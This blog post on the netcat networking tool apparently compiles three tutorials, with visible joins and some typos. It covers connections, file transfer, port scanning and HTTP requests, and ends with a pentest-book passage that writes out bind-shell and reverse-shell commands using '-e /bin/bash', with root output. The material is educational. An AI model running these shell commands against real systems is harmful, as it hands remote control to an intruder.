Netcat Command
Netcat is a powerful and versatile network tool that is available for Linux, Mac, and Windows machines. It is simple to use and essential learning for everyone interested in network communication.
The core functionality of Netcat is allowing two computers to connect and share resources. The name is a portmanteau of network and concatenate, which is a fancy word for joining things together.
Connections can be made directly between machines via TCP or UDP ports. Once established there are many potential use cases. Communication can work bidirectionally so files or information can move from listener to client or client to listener.
Netcat is known as the IT “Swiss Army Knife” because of its wide range of functionalities. It can be used for simple file sending, chatting, web serving, running code remotely. The list is extensive and varied.
I will highlight some of the more common applications throughout this article.
Notoriously, netcat can be used for creating “back door” access. I will explain how this works, but keep in mind this is no longer part of the nc software due to its potential for malicious use.
Netcat (nc) command examples
Here’s the syntax for the nc command:
nc [options] [hostname] [port]The syntax can vary depending on the application, but for most uses, your commands will follow this basic pattern.
Let’s see
1. Create a Connection Using TCP with netcat command
As I mentioned earlier, the core functionality of netcat is joining two machines together. You can set up a connection using TCP to connect two separate machines, you can also emulate that connection using the terminal.
The Listening Machine:
nc -l 8080This command opens port 8080 and tells the machine to begin listening on this port.
In order to establish a connection, you will use another terminal and enter the following.
The Client Machine:
nc 127.0.0.1 8080You can also use ‘localhost’ in place of the IP, or use the IP of your second PC here if you are making a remote connection.
That’s it, you have opened a TCP port and established a connection between two systems.
Quick Intro to TCP vs UDP
Why do we use TCP by default? TCP is an older technology than UDP and they operate at different levels of the OSI model. I will give a quick overview of the differences between them and describe some situations where you may choose one over the other.
TCP has strong error-correction capabilities. What does that mean? Basically, this means that while data packets are in transit from system to system, there are continuous tests being performed. These tests make sure that the information from System A is copied accurately to System B. This is a very simplified version of what happens as information travels across networks (the internet).
There are many protocols used in internet communication, though, not just TCP. UDP has different rules than TCP. Neither is necessarily “better” but they can each excel at performing different tasks.
Why would we use UDP over TCP or vice versa? It depends on the application. TCP is slower, but more reliable for transferring data accurately.
UDP can be chosen in situations where speed is more important than reliability transmitting information. One example of this is streaming data, like video. Video can be transferred more quickly over UDP, and even if there are errors in the transmission, they are less likely to impact the user experience.
2. Create a connection using UDP with nc command
The steps for making a UDP connection are virtually identical to the ones we’ve already followed. You will add an option flag to specify that the type of port you want to open is UDP, not the default TCP.
nc -l -u 999It’s that simple. That’s all you need to do to open UDP port ‘999’.
You might wonder if you can use TCP and UDP with the same port number. You can, because they are separate protocols.
3. Use nc command to transfer files between remote systems
There are other methods for transferring files from one system to another. You can also use the netcat command for this purpose.
For this example, I created a demo that illustrates a remote file transfer from my Linux machine to my MacBook Pro.
Set up the Linux PC to Receive
nc -l 9999 > fromMac.fileYou begin listening on the receiving machine on TCP port 9999. The ‘>‘ tells the machine you are expecting a file to be transferred. The name that follows is the local name for the file.
Set up the Mac PC to Send
nc 172.20.1.168 9999 < toLinux.fileThe IP address here belongs to the Linux machine. You flip the symbol to ‘<‘ and the file ‘toLinux.file’ will be copied onto the remote machine as ‘fromMac.file’.
Working with netcat Security Tool
1. To start listening on a port, first Open 2 terminal windows.
Terminal 1 for listening
$nc -l -p 1234
Terminal 2 sending request
$nc 127.0.0.1 1234
Note: Here the port number is 1234 and by default host is localhost.
It will not display anything but will start listening to port 1234 at the localhost from terminal 1. And anything entered in terminal 2 will be reflected back in terminal 1 as well which confirms that the connection is established successfully.
2. To transfer data. Open 2 terminal windows.
Terminal 1 for listening
$nc -l -p 1234 >output.txt
Terminal 2 for sending request
$echo "GeeksforGeeks" >input.txt $nc 127.0.0.1 1234 <input.txt
Note: Here the port number is 1234 and by default host is localhost. It will send the input.txt file’s data from terminal 2 to the output.txt file at terminal 1.
3. To perform Port Scanning. Enter the following command on the terminal.
Scanning a single port
$netcat -z -v 127.0.0.1 1234
Scanning multiple ports
$nc -z -v 127.0.0.1 1234 1235
Scanning a range of ports
$nc -z -v 127.0.0.1 1233-1240
Note: Here the port numbers are 1234, 1235, 1233, and 1240 you may change them as per your need. It will display the port number with the status(open or not).
4. To send an HTTP Request
$printf “GET /nc.1 HTTPs/1.1\r\nHost: www.geeksforgeeks.org\r\n\r\n” | nc www.geeksforgeeks.org 80
Note: Here the website is www.geeksfrogeeks.org, you may choose any. It will send a HTTP Request to www.geeksfrogeeks.org.
5. To delay the interval for lines sent. Open 2 terminal as shown below:
Terminal 1 for listening
$nc -l -p 1234
Terminal 2 sending request
$nc -i 5 127.0.0.1 1234
Note: Here the port number is 1234 and by default host is localhost. The time taken is 5 seconds. Each will be sent after 5 seconds of time.
Netcat: The Swiss Army Knife of TCP/IP Connections
As the man page notes, the Netcat tool is known as the Swiss Army knife
for TCP/IP connections. It’s a versatile tool that we’ll utilize throughout
this book.
To see Netcat’s various options enter nc -h, as shown in Listing 2-14.
root@kali:~# nc -h
[v1.10-40]
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e’; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
–snip–
Check to See If a Port Is Listening
Let’s have Netcat connect to a port to see if that port is listening for connections.
You saw previously that the Apache web server is listening on port 80
on your Kali Linux system. Tell Netcat to attach to port 80 verbosely, or output
rich, with the -v option as shown next. If you started Apache correctly,
you should see the following when attempting to connect the service.
root@kali:~# nc -v 192.168.20.9 80
(UNKNOWN) [192.168.20.10] 80 (http) open
As you can see, Netcat reports that port 80 is indeed listening (open) on
the network. (We’ll look more at open ports and why they are interesting in
Chapter 5’s discussion of port scanning.)
You can also listen on a port for an incoming connection using Netcat,
as shown next.
root@kali:~# nc -lvp 1234
listening on [any] 1234 …
You use the options l for listen, v for verbose, and p to specify the port
to listen on.
Next, open a second terminal window and use Netcat to connect to the
Netcat listener.
root@kali:~# nc 192.168.20.9 1234
hi georgia
Once you connect, enter the text hi georgia, and when you return to the
listener’s terminal window, you see that a connection was received and your
text was printed.
listening on [any] 1234 …
connect to [192.168.20.9] from (UNKNOWN) [192.168.20.9] 51917
hi georgia
Close down both Netcat processes by pressing ctrl-C.
Opening a Command Shell Listener
Now for something a bit more interesting. When you set up your Netcat
listener, use the -e flag to tell Netcat to execute /bin/bash (or start a Bash
command prompt) when a connection is received. This allows anyone who
connects to the listener to execute commands on your system, as shown next.
root@kali:~# nc -lvp 1234 -e /bin/bash
listening on [any] 1234 …
Again, use a second terminal window to connect to the Netcat listener.
root@kali:~# nc 192.168.20.9 1234
whoami
root
You can now issue Linux commands to be executed by the Netcat listener.
The whoami Linux command will tell you the current logged-in user.
In this case, because the Netcat process was started by the root user, your
commands will be executed as root.
NOTE This is a simple example because both your Netcat listener and the connection are on
the same system. You could use another of your virtual machines, or even your host
system, for this exercise as well.
Close down both Netcat processes again.
Pushing a Command Shell Back to a Listener
In addition to listening on a port with a command shell, you can also push
a command shell back to a Netcat listener. This time set up the Netcat listener
without the -e flag as shown next.
root@kali:~# nc -lvp 1234
listening on [any] 1234 …
Now open a second terminal, and connect back to the Netcat listener
you just created as shown here.
root@kali:~# nc 192.168.20.9 1234 -e /bin/bash
Connect with Netcat as usual, but this time use the -e flag to execute
/bin/bash on the connection. Back in your first terminal you see a connection
as shown next, and if you enter terminal commands, you will see them
executed. (We’ll learn more about listening with /bin/bash on a local port
and actively pushing /bin/bash with a connection, known as bind shells and
reverse shells, respectively, in Chapter 4.)
listening on [any] 1234 …
connect to [192.168.20.9] from (UNKNOWN) [192.168.20.9] 51921
whoami
root
Now, one more thing with Netcat. This time, instead of outputting what
comes into your listener to the screen, use > to send it to a file as shown next.
root@kali:~# nc -lvp 1234 > netcatfile
listening on [any] 1234 …
In the second terminal you set up Netcat to connect, but this time you
use the < symbol to tell it to send the contents of a file (myfile) over the
Netcat connection. Give Netcat a second or two to finish, and then examine
the contents of the file netcatfile created by your first Netcat instance. The
contents should be identical to myfile.
root@kali:~# nc 192.168.20.9 1234 < mydirectory/myfile
You have used Netcat to transfer the file. In this case we’ve simply transferred
the file from one directory to another, but you can imagine how this
technique can be used to transfer files from system to system—a technique
that often comes in handy in the post-exploitation phase of a pentest, once
you have access to a system
Published @ March 23, 2022 6:01 am